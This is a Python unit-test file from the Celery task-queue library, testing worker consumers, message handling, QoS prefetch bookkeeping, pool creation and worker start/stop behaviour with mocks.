class test_default_strategy_proto1__no_utc(test_default_strategy_proto2): def get_message_class(self): return self.TaskMessage1 def prepare_message(self, message): message.payload['utc'] = False return message class test_custom_request_for_default_strategy(test_default_strategy_proto2): def test_custom_request_gets_instantiated(self): _MyRequest = Mock(name='MyRequest') class MyRequest(Request): def 
__init__(self, *args, **kwargs):
                super().__init__(*args, **kwargs)
                _MyRequest()

        class MyTask(Task):
            Request = MyRequest

        @self.app.task(base=MyTask)
        def failed():
            raise AssertionError

        sig = failed.s()
        with self._context(sig) as C:
            task_message_handler = default_strategy(
                failed,
                self.app,
                C.consumer
            )
            task_message_handler(C.message, None, None, None, None)
            _MyRequest.assert_called()


class test_hybrid_to_proto2:

    def setup(self):
        self.message = Mock(name='message', headers={"custom": "header"})
        self.body = {
            'args': (1,),
            'kwargs': {'foo': 'baz'},
            'utc': False,
            'taskset': '123',
        }

    def test_retries_default_value(self):
        _, headers, _, _ = hybrid_to_proto2(self.message, self.body)
        assert headers.get('retries') == 0

    def test_retries_custom_value(self):
        _custom_value = 3
        self.body['retries'] = _custom_value
        _, headers, _, _ = hybrid_to_proto2(self.message, self.body)
        assert headers.get('retries') == _custom_value

    def test_custom_headers(self):
        _, headers, _, _ = hybrid_to_proto2(self.message, self.body)
        assert headers.get("custom") == "header"


# ---- celery-5.2.3/t/unit/worker/test_worker.py ----

import os
import socket
import sys
from collections import deque
from datetime import datetime, timedelta
from functools import partial
from queue import Empty
from queue import Queue as FastQueue
from threading import Event
from unittest.mock import Mock, patch

import pytest
from amqp import ChannelError
from kombu import Connection
from kombu.asynchronous import get_event_loop
from kombu.common import QoS, ignore_errors
from kombu.transport.base import Message
from kombu.transport.memory import Transport
from kombu.utils.uuid import uuid

import t.skip
from celery.bootsteps import CLOSE, RUN, TERMINATE, StartStopStep
from celery.concurrency.base import BasePool
from celery.exceptions import (ImproperlyConfigured, InvalidTaskError,
                               TaskRevokedError, WorkerShutdown,
                               WorkerTerminate)
from celery.platforms import EX_FAILURE
from celery.utils.nodenames import worker_direct
from celery.utils.serialization import pickle
from celery.utils.timer2 import Timer
from celery.worker import autoscale, components, consumer, state
from celery.worker import worker as worker_module
from celery.worker.consumer import Consumer
from celery.worker.pidbox import gPidbox
from celery.worker.request import Request


def MockStep(step=None):
    if step is None:
        step = Mock(name='step')
    else:
        step.blueprint = Mock(name='step.blueprint')
    step.blueprint.name = 'MockNS'
    step.name = f'MockStep({id(step)})'
    return step


def mock_event_dispatcher():
    evd = Mock(name='event_dispatcher')
    evd.groups = ['worker']
    evd._outbound_buffer = deque()
    return evd


def find_step(obj, typ):
    return obj.blueprint.steps[typ.name]


def create_message(channel, **data):
    data.setdefault('id', uuid())
    m = Message(body=pickle.dumps(dict(**data)),
                channel=channel,
                content_type='application/x-python-serialize',
                content_encoding='binary',
                delivery_info={'consumer_tag': 'mock'})
    m.accept = ['application/x-python-serialize']
    return m


class ConsumerCase:

    def create_task_message(self, channel, *args, **kwargs):
        m = self.TaskMessage(*args, **kwargs)
        m.channel = channel
        m.delivery_info = {'consumer_tag': 'mock'}
        return m


class test_Consumer(ConsumerCase):

    def setup(self):
        self.buffer = FastQueue()
        self.timer = Timer()

        @self.app.task(shared=False)
        def foo_task(x, y, z):
            return x * y * z
        self.foo_task =
foo_task def teardown(self): self.timer.stop() def LoopConsumer(self, buffer=None, controller=None, timer=None, app=None, without_mingle=True, without_gossip=True, without_heartbeat=True, **kwargs): if controller is None: controller = Mock(name='.controller') buffer = buffer if buffer is not None else self.buffer.put timer = timer if timer is not None else self.timer app = app if app is not None else self.app c = Consumer( buffer, timer=timer, app=app, controller=controller, without_mingle=without_mingle, without_gossip=without_gossip, without_heartbeat=without_heartbeat, **kwargs ) c.task_consumer = Mock(name='.task_consumer') c.qos = QoS(c.task_consumer.qos, 10) c.connection = Mock(name='.connection') c.controller = c.app.WorkController() c.heart = Mock(name='.heart') c.controller.consumer = c c.pool = c.controller.pool = Mock(name='.controller.pool') c.node = Mock(name='.node') c.event_dispatcher = mock_event_dispatcher() return c def NoopConsumer(self, *args, **kwargs): c = self.LoopConsumer(*args, **kwargs) c.loop = Mock(name='.loop') return c def test_info(self): c = self.NoopConsumer() c.connection.info.return_value = {'foo': 'bar'} c.controller.pool.info.return_value = [Mock(), Mock()] info = c.controller.stats() assert info['prefetch_count'] == 10 assert info['broker'] def test_start_when_closed(self): c = self.NoopConsumer() c.blueprint.state = CLOSE c.start() def test_connection(self): c = self.NoopConsumer() c.blueprint.start(c) assert isinstance(c.connection, Connection) c.blueprint.state = RUN c.event_dispatcher = None c.blueprint.restart(c) assert c.connection c.blueprint.state = RUN c.shutdown() assert c.connection is None assert c.task_consumer is None c.blueprint.start(c) assert isinstance(c.connection, Connection) c.blueprint.restart(c) c.stop() c.shutdown() assert c.connection is None assert c.task_consumer is None def test_close_connection(self): c = self.NoopConsumer() c.blueprint.state = RUN step = find_step(c, consumer.Connection) connection = c.connection step.shutdown(c) connection.close.assert_called() assert c.connection is None def test_close_connection__heart_shutdown(self): c = self.NoopConsumer() event_dispatcher = c.event_dispatcher heart = c.heart c.event_dispatcher.enabled = True c.blueprint.state = RUN Events = find_step(c, consumer.Events) Events.shutdown(c) Heart = find_step(c, consumer.Heart) Heart.shutdown(c) event_dispatcher.close.assert_called() heart.stop.assert_called_with() @patch('celery.worker.consumer.consumer.warn') def test_receive_message_unknown(self, warn): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() channel = Mock(name='.channeol') m = create_message(channel, unknown={'baz': '!!!'}) callback = self._get_on_message(c) callback(m) warn.assert_called() @patch('celery.worker.strategy.to_timestamp') def test_receive_message_eta_OverflowError(self, to_timestamp): to_timestamp.side_effect = OverflowError() c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() m = self.create_task_message( Mock(), self.foo_task.name, args=('2, 2'), kwargs={}, eta=datetime.now().isoformat(), ) c.update_strategies() callback = self._get_on_message(c) callback(m) assert m.acknowledged @patch('celery.worker.consumer.consumer.error') def test_receive_message_InvalidTaskError(self, error): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() m = self.create_task_message( Mock(), self.foo_task.name, args=(1, 2), kwargs='foobarbaz', id=1) c.update_strategies() strat = c.strategies[self.foo_task.name] = Mock(name='strategy') 
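# Swapping the registered strategy for a Mock that raises InvalidTaskError
# drives the consumer down its invalid-task error path without needing a
# genuinely malformed message body.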
strat.side_effect = InvalidTaskError() callback = self._get_on_message(c) callback(m) error.assert_called() assert 'Received invalid task message' in error.call_args[0][0] @patch('celery.worker.consumer.consumer.crit') def test_on_decode_error(self, crit): c = self.LoopConsumer() class MockMessage(Mock): content_type = 'application/x-msgpack' content_encoding = 'binary' body = 'foobarbaz' message = MockMessage() c.on_decode_error(message, KeyError('foo')) assert message.ack.call_count assert "Can't decode message body" in crit.call_args[0][0] def _get_on_message(self, c): if c.qos is None: c.qos = Mock() c.task_consumer = Mock() c.event_dispatcher = mock_event_dispatcher() c.connection = Mock(name='.connection') c.connection.get_heartbeat_interval.return_value = 0 c.connection.drain_events.side_effect = WorkerShutdown() with pytest.raises(WorkerShutdown): c.loop(*c.loop_args()) assert c.task_consumer.on_message return c.task_consumer.on_message def test_receieve_message(self): c = self.LoopConsumer() c.blueprint.state = RUN m = self.create_task_message( Mock(), self.foo_task.name, args=[2, 4, 8], kwargs={}, ) c.update_strategies() callback = self._get_on_message(c) callback(m) in_bucket = self.buffer.get_nowait() assert isinstance(in_bucket, Request) assert in_bucket.name == self.foo_task.name assert in_bucket.execute() == 2 * 4 * 8 assert self.timer.empty() def test_start_channel_error(self): def loop_side_effect(): yield KeyError('foo') yield SyntaxError('bar') c = self.NoopConsumer(task_events=False, pool=BasePool()) c.loop.side_effect = loop_side_effect() c.channel_errors = (KeyError,) try: with pytest.raises(KeyError): c.start() finally: c.timer and c.timer.stop() def test_start_connection_error(self): def loop_side_effect(): yield KeyError('foo') yield SyntaxError('bar') c = self.NoopConsumer(task_events=False, pool=BasePool()) c.loop.side_effect = loop_side_effect() c.connection_errors = (KeyError,) try: with pytest.raises(SyntaxError): c.start() finally: c.timer and c.timer.stop() def test_loop_ignores_socket_timeout(self): class Connection(self.app.connection_for_read().__class__): obj = None def drain_events(self, **kwargs): self.obj.connection = None raise socket.timeout(10) c = self.NoopConsumer() c.connection = Connection(self.app.conf.broker_url) c.connection.obj = c c.qos = QoS(c.task_consumer.qos, 10) c.loop(*c.loop_args()) def test_loop_when_socket_error(self): class Connection(self.app.connection_for_read().__class__): obj = None def drain_events(self, **kwargs): self.obj.connection = None raise OSError('foo') c = self.LoopConsumer() c.blueprint.state = RUN conn = c.connection = Connection(self.app.conf.broker_url) c.connection.obj = c c.qos = QoS(c.task_consumer.qos, 10) with pytest.raises(socket.error): c.loop(*c.loop_args()) c.blueprint.state = CLOSE c.connection = conn c.loop(*c.loop_args()) def test_loop(self): class Connection(self.app.connection_for_read().__class__): obj = None def drain_events(self, **kwargs): self.obj.connection = None @property def supports_heartbeats(self): return False c = self.LoopConsumer() c.blueprint.state = RUN c.connection = Connection(self.app.conf.broker_url) c.connection.obj = c c.connection.get_heartbeat_interval = Mock(return_value=None) c.qos = QoS(c.task_consumer.qos, 10) c.loop(*c.loop_args()) c.loop(*c.loop_args()) assert c.task_consumer.consume.call_count c.task_consumer.qos.assert_called_with(prefetch_count=10) assert c.qos.value == 10 c.qos.decrement_eventually() assert c.qos.value == 9 c.qos.update() assert c.qos.value == 9 
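# A minimal, self-contained sketch (not part of the original test) of the QoS
# bookkeeping asserted here, assuming only kombu.common.QoS as imported at the
# top of this file: decrement_eventually() changes the local value, and
# update() is what pushes the new prefetch count through the callback.
from kombu.common import QoS as _QoSSketch
_applied = []
_qos = _QoSSketch(lambda prefetch_count: _applied.append(prefetch_count), 10)
_qos.decrement_eventually()   # local value drops to 9, nothing sent yet
_qos.update()                 # callback invoked with prefetch_count=9
assert _qos.value == 9 and _applied == [9]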
c.task_consumer.qos.assert_called_with(prefetch_count=9) def test_ignore_errors(self): c = self.NoopConsumer() c.connection_errors = (AttributeError, KeyError,) c.channel_errors = (SyntaxError,) ignore_errors(c, Mock(side_effect=AttributeError('foo'))) ignore_errors(c, Mock(side_effect=KeyError('foo'))) ignore_errors(c, Mock(side_effect=SyntaxError('foo'))) with pytest.raises(IndexError): ignore_errors(c, Mock(side_effect=IndexError('foo'))) def test_apply_eta_task(self): c = self.NoopConsumer() c.qos = QoS(None, 10) task = Mock(name='task', id='1234213') qos = c.qos.value c.apply_eta_task(task) assert task in state.reserved_requests assert c.qos.value == qos - 1 assert self.buffer.get_nowait() is task def test_receieve_message_eta_isoformat(self): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() m = self.create_task_message( Mock(), self.foo_task.name, eta=(datetime.now() + timedelta(days=1)).isoformat(), args=[2, 4, 8], kwargs={}, ) c.qos = QoS(c.task_consumer.qos, 1) current_pcount = c.qos.value c.event_dispatcher.enabled = False c.update_strategies() callback = self._get_on_message(c) callback(m) c.timer.stop() c.timer.join(1) items = [entry[2] for entry in self.timer.queue] found = 0 for item in items: if item.args[0].name == self.foo_task.name: found = True assert found assert c.qos.value > current_pcount c.timer.stop() def test_pidbox_callback(self): c = self.NoopConsumer() con = find_step(c, consumer.Control).box con.node = Mock() con.reset = Mock() con.on_message('foo', 'bar') con.node.handle_message.assert_called_with('foo', 'bar') con.node = Mock() con.node.handle_message.side_effect = KeyError('foo') con.on_message('foo', 'bar') con.node.handle_message.assert_called_with('foo', 'bar') con.node = Mock() con.node.handle_message.side_effect = ValueError('foo') con.on_message('foo', 'bar') con.node.handle_message.assert_called_with('foo', 'bar') con.reset.assert_called() def test_revoke(self): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() channel = Mock(name='channel') id = uuid() t = self.create_task_message( channel, self.foo_task.name, args=[2, 4, 8], kwargs={}, id=id, ) state.revoked.add(id) callback = self._get_on_message(c) callback(t) assert self.buffer.empty() def test_receieve_message_not_registered(self): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() channel = Mock(name='channel') m = self.create_task_message( channel, 'x.X.31x', args=[2, 4, 8], kwargs={}, ) callback = self._get_on_message(c) assert not callback(m) with pytest.raises(Empty): self.buffer.get_nowait() assert self.timer.empty() @patch('celery.worker.consumer.consumer.warn') @patch('celery.worker.consumer.consumer.logger') def test_receieve_message_ack_raises(self, logger, warn): c = self.LoopConsumer() c.blueprint.state = RUN channel = Mock(name='channel') m = self.create_task_message( channel, self.foo_task.name, args=[2, 4, 8], kwargs={}, ) m.headers = None c.update_strategies() c.connection_errors = (socket.error,) m.reject = Mock() m.reject.side_effect = socket.error('foo') callback = self._get_on_message(c) assert not callback(m) warn.assert_called() with pytest.raises(Empty): self.buffer.get_nowait() assert self.timer.empty() m.reject_log_error.assert_called_with(logger, c.connection_errors) def test_receive_message_eta(self): if os.environ.get('C_DEBUG_TEST'): pp = partial(print, file=sys.__stderr__) else: def pp(*args, **kwargs): pass pp('TEST RECEIVE MESSAGE ETA') pp('+CREATE MYKOMBUCONSUMER') c = self.LoopConsumer() pp('-CREATE MYKOMBUCONSUMER') 
c.steps.pop() channel = Mock(name='channel') pp('+ CREATE MESSAGE') m = self.create_task_message( channel, self.foo_task.name, args=[2, 4, 8], kwargs={}, eta=(datetime.now() + timedelta(days=1)).isoformat(), ) pp('- CREATE MESSAGE') try: pp('+ BLUEPRINT START 1') c.blueprint.start(c) pp('- BLUEPRINT START 1') p = c.app.conf.broker_connection_retry c.app.conf.broker_connection_retry = False pp('+ BLUEPRINT START 2') c.blueprint.start(c) pp('- BLUEPRINT START 2') c.app.conf.broker_connection_retry = p pp('+ BLUEPRINT RESTART') c.blueprint.restart(c) pp('- BLUEPRINT RESTART') pp('+ GET ON MESSAGE') callback = self._get_on_message(c) pp('- GET ON MESSAGE') pp('+ CALLBACK') callback(m) pp('- CALLBACK') finally: pp('+ STOP TIMER') c.timer.stop() pp('- STOP TIMER') try: pp('+ JOIN TIMER') c.timer.join() pp('- JOIN TIMER') except RuntimeError: pass in_hold = c.timer.queue[0] assert len(in_hold) == 3 eta, priority, entry = in_hold task = entry.args[0] assert isinstance(task, Request) assert task.name == self.foo_task.name assert task.execute() == 2 * 4 * 8 with pytest.raises(Empty): self.buffer.get_nowait() def test_reset_pidbox_node(self): c = self.NoopConsumer() con = find_step(c, consumer.Control).box con.node = Mock() chan = con.node.channel = Mock() chan.close.side_effect = socket.error('foo') c.connection_errors = (socket.error,) con.reset() chan.close.assert_called_with() def test_reset_pidbox_node_green(self): c = self.NoopConsumer(pool=Mock(is_green=True)) con = find_step(c, consumer.Control) assert isinstance(con.box, gPidbox) con.start(c) c.pool.spawn_n.assert_called_with(con.box.loop, c) def test_green_pidbox_node(self): pool = Mock() pool.is_green = True c = self.NoopConsumer(pool=Mock(is_green=True)) controller = find_step(c, consumer.Control) class BConsumer(Mock): def __enter__(self): self.consume() return self def __exit__(self, *exc_info): self.cancel() controller.box.node.listen = BConsumer() connections = [] class Connection: calls = 0 def __init__(self, obj): connections.append(self) self.obj = obj self.default_channel = self.channel() self.closed = False def __enter__(self): return self def __exit__(self, *exc_info): self.close() def channel(self): return Mock() def as_uri(self): return 'dummy://' def drain_events(self, **kwargs): if not self.calls: self.calls += 1 raise socket.timeout() self.obj.connection = None controller.box._node_shutdown.set() def close(self): self.closed = True c.connection_for_read = lambda: Connection(obj=c) controller = find_step(c, consumer.Control) controller.box.loop(c) controller.box.node.listen.assert_called() assert controller.box.consumer controller.box.consumer.consume.assert_called_with() assert c.connection is None assert connections[0].closed @patch('kombu.connection.Connection._establish_connection') @patch('kombu.utils.functional.sleep') def test_connect_errback(self, sleep, connect): def connect_side_effect(): yield Mock() while True: yield ChannelError('error') c = self.NoopConsumer() Transport.connection_errors = (ChannelError,) connect.side_effect = connect_side_effect() c.connect() connect.assert_called_with() def test_stop_pidbox_node(self): c = self.NoopConsumer() cont = find_step(c, consumer.Control) cont._node_stopped = Event() cont._node_shutdown = Event() cont._node_stopped.set() cont.stop(c) def test_start__loop(self): class _QoS: prev = 3 value = 4 def update(self): self.prev = self.value init_callback = Mock(name='init_callback') c = self.NoopConsumer(init_callback=init_callback) c.qos = _QoS() c.connection = 
Connection(self.app.conf.broker_url) c.connection.get_heartbeat_interval = Mock(return_value=None) c.iterations = 0 def raises_KeyError(*args, **kwargs): c.iterations += 1 if c.qos.prev != c.qos.value: c.qos.update() if c.iterations >= 2: raise KeyError('foo') c.loop = raises_KeyError with pytest.raises(KeyError): c.start() assert c.iterations == 2 assert c.qos.prev == c.qos.value init_callback.reset_mock() c = self.NoopConsumer(task_events=False, init_callback=init_callback) c.qos = _QoS() c.connection = Connection(self.app.conf.broker_url) c.connection.get_heartbeat_interval = Mock(return_value=None) c.loop = Mock(side_effect=socket.error('foo')) with pytest.raises(socket.error): c.start() c.loop.assert_called() def test_reset_connection_with_no_node(self): c = self.NoopConsumer() c.steps.pop() c.blueprint.start(c) class test_WorkController(ConsumerCase): def setup(self): self.worker = self.create_worker() self._logger = worker_module.logger self._comp_logger = components.logger self.logger = worker_module.logger = Mock() self.comp_logger = components.logger = Mock() @self.app.task(shared=False) def foo_task(x, y, z): return x * y * z self.foo_task = foo_task def teardown(self): worker_module.logger = self._logger components.logger = self._comp_logger def create_worker(self, **kw): worker = self.app.WorkController(concurrency=1, loglevel=0, **kw) worker.blueprint.shutdown_complete.set() return worker def test_on_consumer_ready(self): self.worker.on_consumer_ready(Mock()) def test_setup_queues_worker_direct(self): self.app.conf.worker_direct = True self.app.amqp.__dict__['queues'] = Mock() self.worker.setup_queues({}) self.app.amqp.queues.select_add.assert_called_with( worker_direct(self.worker.hostname), ) def test_setup_queues__missing_queue(self): self.app.amqp.queues.select = Mock(name='select') self.app.amqp.queues.deselect = Mock(name='deselect') self.app.amqp.queues.select.side_effect = KeyError() self.app.amqp.queues.deselect.side_effect = KeyError() with pytest.raises(ImproperlyConfigured): self.worker.setup_queues('x,y', exclude='foo,bar') self.app.amqp.queues.select = Mock(name='select') with pytest.raises(ImproperlyConfigured): self.worker.setup_queues('x,y', exclude='foo,bar') def test_send_worker_shutdown(self): with patch('celery.signals.worker_shutdown') as ws: self.worker._send_worker_shutdown() ws.send.assert_called_with(sender=self.worker) @pytest.mark.skip('TODO: unstable test') def test_process_shutdown_on_worker_shutdown(self): from celery.concurrency.asynpool import Worker from celery.concurrency.prefork import process_destructor with patch('celery.signals.worker_process_shutdown') as ws: with patch('os._exit') as _exit: worker = Worker(None, None, on_exit=process_destructor) worker._do_exit(22, 3.1415926) ws.send.assert_called_with( sender=None, pid=22, exitcode=3.1415926, ) _exit.assert_called_with(3.1415926) def test_process_task_revoked_release_semaphore(self): self.worker._quick_release = Mock() req = Mock() req.execute_using_pool.side_effect = TaskRevokedError self.worker._process_task(req) self.worker._quick_release.assert_called_with() delattr(self.worker, '_quick_release') self.worker._process_task(req) def test_shutdown_no_blueprint(self): self.worker.blueprint = None self.worker._shutdown() @patch('celery.worker.worker.create_pidlock') def test_use_pidfile(self, create_pidlock): create_pidlock.return_value = Mock() worker = self.create_worker(pidfile='pidfilelockfilepid') worker.steps = [] worker.start() create_pidlock.assert_called() worker.stop() 
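# Stopping the worker should release the pidlock that create_pidlock() set up
# during start().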
worker.pidlock.release.assert_called() def test_attrs(self): worker = self.worker assert worker.timer is not None assert isinstance(worker.timer, Timer) assert worker.pool is not None assert worker.consumer is not None assert worker.steps def test_with_embedded_beat(self): worker = self.app.WorkController(concurrency=1, loglevel=0, beat=True) assert worker.beat assert worker.beat in [w.obj for w in worker.steps] def test_with_autoscaler(self): worker = self.create_worker( autoscale=[10, 3], send_events=False, timer_cls='celery.utils.timer2.Timer', ) assert worker.autoscaler @t.skip.if_win32 @pytest.mark.sleepdeprived_patched_module(autoscale) def test_with_autoscaler_file_descriptor_safety(self, sleepdeprived): # Given: a test celery worker instance with auto scaling worker = self.create_worker( autoscale=[10, 5], use_eventloop=True, timer_cls='celery.utils.timer2.Timer', threads=False, ) # Given: This test requires a QoS defined on the worker consumer worker.consumer.qos = qos = QoS(lambda prefetch_count: prefetch_count, 2) qos.update() # Given: We have started the worker pool worker.pool.start() # Then: the worker pool is the same as the autoscaler pool auto_scaler = worker.autoscaler assert worker.pool == auto_scaler.pool # Given: Utilize kombu to get the global hub state hub = get_event_loop() # Given: Initial call the Async Pool to register events works fine worker.pool.register_with_event_loop(hub) # Create some mock queue message and read from them _keep = [Mock(name=f'req{i}') for i in range(20)] [state.task_reserved(m) for m in _keep] auto_scaler.body() # Simulate a file descriptor from the list is closed by the OS # auto_scaler.force_scale_down(5) # This actually works -- it releases the semaphore properly # Same with calling .terminate() on the process directly for fd, proc in worker.pool._pool._fileno_to_outq.items(): # however opening this fd as a file and closing it will do it queue_worker_socket = open(str(fd), "w") queue_worker_socket.close() break # Only need to do this once # When: Calling again to register with event loop ... worker.pool.register_with_event_loop(hub) # Then: test did not raise "OSError: [Errno 9] Bad file descriptor!" # Finally: Clean up so the threads before/after fixture passes worker.terminate() worker.pool.terminate() @t.skip.if_win32 @pytest.mark.sleepdeprived_patched_module(autoscale) def test_with_file_descriptor_safety(self, sleepdeprived): # Given: a test celery worker instance worker = self.create_worker( autoscale=[10, 5], use_eventloop=True, timer_cls='celery.utils.timer2.Timer', threads=False, ) # Given: This test requires a QoS defined on the worker consumer worker.consumer.qos = qos = QoS(lambda prefetch_count: prefetch_count, 2) qos.update() # Given: We have started the worker pool worker.pool.start() # Given: Utilize kombu to get the global hub state hub = get_event_loop() # Given: Initial call the Async Pool to register events works fine worker.pool.register_with_event_loop(hub) # Given: Mock the Hub to return errors for add and remove def throw_file_not_found_error(*args, **kwargs): raise OSError() hub.add = throw_file_not_found_error hub.add_reader = throw_file_not_found_error hub.remove = throw_file_not_found_error # When: Calling again to register with event loop ... worker.pool.register_with_event_loop(hub) worker.pool._pool.register_with_event_loop(hub) # Then: test did not raise OSError # Note: worker.pool is prefork.TaskPool whereas # worker.pool._pool is the asynpool.AsynPool class. 
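# Both the outer prefork.TaskPool and the inner asynpool.AsynPool expose
# register_with_event_loop(), which is why the hub error handling is exercised
# at both layers above.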

        # When: Calling the tick method on_poll_start
        worker.pool._pool.on_poll_start()
        # Then: test did not raise OSError

        # Given: a mock object that fakes what's required to do what's next
        proc = Mock(_sentinel_poll=42)

        # When: Calling again to register with event loop ...
        worker.pool._pool._track_child_process(proc, hub)
        # Then: test did not raise OSError

        # Given:
        worker.pool._pool._flush_outqueue = throw_file_not_found_error

        # Finally: Clean up so the threads before/after fixture passes
        worker.terminate()
        worker.pool.terminate()

    def test_dont_stop_or_terminate(self):
        worker = self.app.WorkController(concurrency=1, loglevel=0)
        worker.stop()
        assert worker.blueprint.state != CLOSE
        worker.terminate()
        assert worker.blueprint.state != CLOSE

        sigsafe, worker.pool.signal_safe = worker.pool.signal_safe, False
        try:
            worker.blueprint.state = RUN
            worker.stop(in_sighandler=True)
            assert worker.blueprint.state != CLOSE
            worker.terminate(in_sighandler=True)
            assert worker.blueprint.state != CLOSE
        finally:
            worker.pool.signal_safe = sigsafe

    def test_on_timer_error(self):
        worker = self.app.WorkController(concurrency=1, loglevel=0)

        try:
            raise KeyError('foo')
        except KeyError as exc:
            components.Timer(worker).on_timer_error(exc)
            msg, args = self.comp_logger.error.call_args[0]
            assert 'KeyError' in msg % args

    def test_on_timer_tick(self):
        worker = self.app.WorkController(concurrency=1, loglevel=10)

        components.Timer(worker).on_timer_tick(30.0)
        xargs = self.comp_logger.debug.call_args[0]
        fmt, arg = xargs[0], xargs[1]
        assert arg == 30.0
        assert 'Next ETA %s secs' in fmt

    def test_process_task(self):
        worker = self.worker
        worker.pool = Mock()
        channel = Mock()
        m = self.create_task_message(
            channel, self.foo_task.name,
            args=[4, 8, 10], kwargs={},
        )
        task = Request(m, app=self.app)
        worker._process_task(task)
        assert worker.pool.apply_async.call_count == 1
        worker.pool.stop()

    def test_process_task_raise_base(self):
        worker = self.worker
        worker.pool = Mock()
        worker.pool.apply_async.side_effect = KeyboardInterrupt('Ctrl+C')
        channel = Mock()
        m = self.create_task_message(
            channel, self.foo_task.name,
            args=[4, 8, 10], kwargs={},
        )
        task = Request(m, app=self.app)
        worker.steps = []
        worker.blueprint.state = RUN
        with pytest.raises(KeyboardInterrupt):
            worker._process_task(task)

    def test_process_task_raise_WorkerTerminate(self):
        worker = self.worker
        worker.pool = Mock()
        worker.pool.apply_async.side_effect = WorkerTerminate()
        channel = Mock()
        m = self.create_task_message(
            channel, self.foo_task.name,
            args=[4, 8, 10], kwargs={},
        )
        task = Request(m, app=self.app)
        worker.steps = []
        worker.blueprint.state = RUN
        with pytest.raises(SystemExit):
            worker._process_task(task)

    def test_process_task_raise_regular(self):
        worker = self.worker
        worker.pool = Mock()
        worker.pool.apply_async.side_effect = KeyError('some exception')
        channel = Mock()
        m = self.create_task_message(
            channel, self.foo_task.name,
            args=[4, 8, 10], kwargs={},
        )
        task = Request(m, app=self.app)
        with pytest.raises(KeyError):
            worker._process_task(task)
        worker.pool.stop()

    def test_start_catches_base_exceptions(self):
        worker1 = self.create_worker()
        worker1.blueprint.state = RUN
        stc = MockStep()
        stc.start.side_effect = WorkerTerminate()
        worker1.steps = [stc]
        worker1.start()
        stc.start.assert_called_with(worker1)
        assert stc.terminate.call_count

        worker2 = self.create_worker()
        worker2.blueprint.state = RUN
        sec = MockStep()
        sec.start.side_effect = WorkerShutdown()
        sec.terminate = None
        worker2.steps = [sec]
        worker2.start()
        assert sec.stop.call_count

    def test_statedb(self):
        from celery.worker import state
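        # state.Persistent is swapped for a Mock so that no real state file is
        # written to disk; the original class is restored in the finally block.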
        Persistent = state.Persistent
        state.Persistent = Mock()
        try:
            worker = self.create_worker(statedb='statefilename')
            assert worker._persistence
        finally:
            state.Persistent = Persistent

    def test_process_task_sem(self):
        worker = self.worker
        worker._quick_acquire = Mock()
        req = Mock()
        worker._process_task_sem(req)
        worker._quick_acquire.assert_called_with(worker._process_task, req)

    def test_signal_consumer_close(self):
        worker = self.worker
        worker.consumer = Mock()

        worker.signal_consumer_close()
        worker.consumer.close.assert_called_with()

        worker.consumer.close.side_effect = AttributeError()
        worker.signal_consumer_close()

    def test_rusage__no_resource(self):
        from celery.worker import worker
        prev, worker.resource = worker.resource, None
        try:
            self.worker.pool = Mock(name='pool')
            with pytest.raises(NotImplementedError):
                self.worker.rusage()
            self.worker.stats()
        finally:
            worker.resource = prev

    def test_repr(self):
        assert repr(self.worker)

    def test_str(self):
        assert str(self.worker) == self.worker.hostname

    def test_start__stop(self):
        worker = self.worker
        worker.blueprint.shutdown_complete.set()
        worker.steps = [MockStep(StartStopStep(self)) for _ in range(4)]
        worker.blueprint.state = RUN
        worker.blueprint.started = 4
        for w in worker.steps:
            w.start = Mock()
            w.close = Mock()
            w.stop = Mock()

        worker.start()
        for w in worker.steps:
            w.start.assert_called()
        worker.consumer = Mock()
        worker.stop(exitcode=3)
        for stopstep in worker.steps:
            stopstep.close.assert_called()
            stopstep.stop.assert_called()

        # Doesn't close pool if no pool.
        worker.start()
        worker.pool = None
        worker.stop()

        # test that stop of None is not attempted
        worker.steps[-1] = None
        worker.start()
        worker.stop()

    def test_start__KeyboardInterrupt(self):
        worker = self.worker
        worker.blueprint = Mock(name='blueprint')
        worker.blueprint.start.side_effect = KeyboardInterrupt()
        worker.stop = Mock(name='stop')
        worker.start()
        worker.stop.assert_called_with(exitcode=EX_FAILURE)

    def test_register_with_event_loop(self):
        worker = self.worker
        hub = Mock(name='hub')
        worker.blueprint = Mock(name='blueprint')
        worker.register_with_event_loop(hub)
        worker.blueprint.send_all.assert_called_with(
            worker, 'register_with_event_loop', args=(hub,),
            description='hub.register',
        )

    def test_step_raises(self):
        worker = self.worker
        step = Mock()
        worker.steps = [step]
        step.start.side_effect = TypeError()
        worker.stop = Mock()
        worker.start()
        worker.stop.assert_called_with(exitcode=EX_FAILURE)

    def test_state(self):
        assert self.worker.state

    def test_start__terminate(self):
        worker = self.worker
        worker.blueprint.shutdown_complete.set()
        worker.blueprint.started = 5
        worker.blueprint.state = RUN
        worker.steps = [MockStep() for _ in range(5)]
        worker.start()
        for w in worker.steps[:3]:
            w.start.assert_called()
        assert worker.blueprint.started == len(worker.steps)
        assert worker.blueprint.state == RUN
        worker.terminate()
        for step in worker.steps:
            step.terminate.assert_called()
        worker.blueprint.state = TERMINATE
        worker.terminate()

    def test_Hub_create(self):
        w = Mock()
        x = components.Hub(w)
        x.create(w)
        assert w.timer.max_interval

    def test_Pool_create_threaded(self):
        w = Mock()
        w._conninfo.connection_errors = w._conninfo.channel_errors = ()
        w.pool_cls = Mock()
        w.use_eventloop = False
        pool = components.Pool(w)
        pool.create(w)

    def test_Pool_pool_no_sem(self):
        w = Mock()
        w.pool_cls.uses_semaphore = False
        components.Pool(w).create(w)
        assert w.process_task is w._process_task

    def test_Pool_create(self):
        from kombu.asynchronous.semaphore import LaxBoundedSemaphore
        w = Mock()
        w._conninfo.connection_errors = w._conninfo.channel_errors = ()
        w.hub = Mock()

        PoolImp = Mock()
        poolimp = PoolImp.return_value = Mock()
        poolimp._pool = [Mock(), Mock()]
        poolimp._cache = {}
        poolimp._fileno_to_inq = {}
        poolimp._fileno_to_outq = {}

        from celery.concurrency.prefork import TaskPool as _TaskPool

        class MockTaskPool(_TaskPool):
            Pool = PoolImp

            @property
            def timers(self):
                return {Mock(): 30}

        w.pool_cls = MockTaskPool
        w.use_eventloop = True
        w.consumer.restart_count = -1
        pool = components.Pool(w)
        pool.create(w)
        pool.register_with_event_loop(w, w.hub)
        if sys.platform != 'win32':
            assert isinstance(w.semaphore, LaxBoundedSemaphore)
            P = w.pool
            P.start()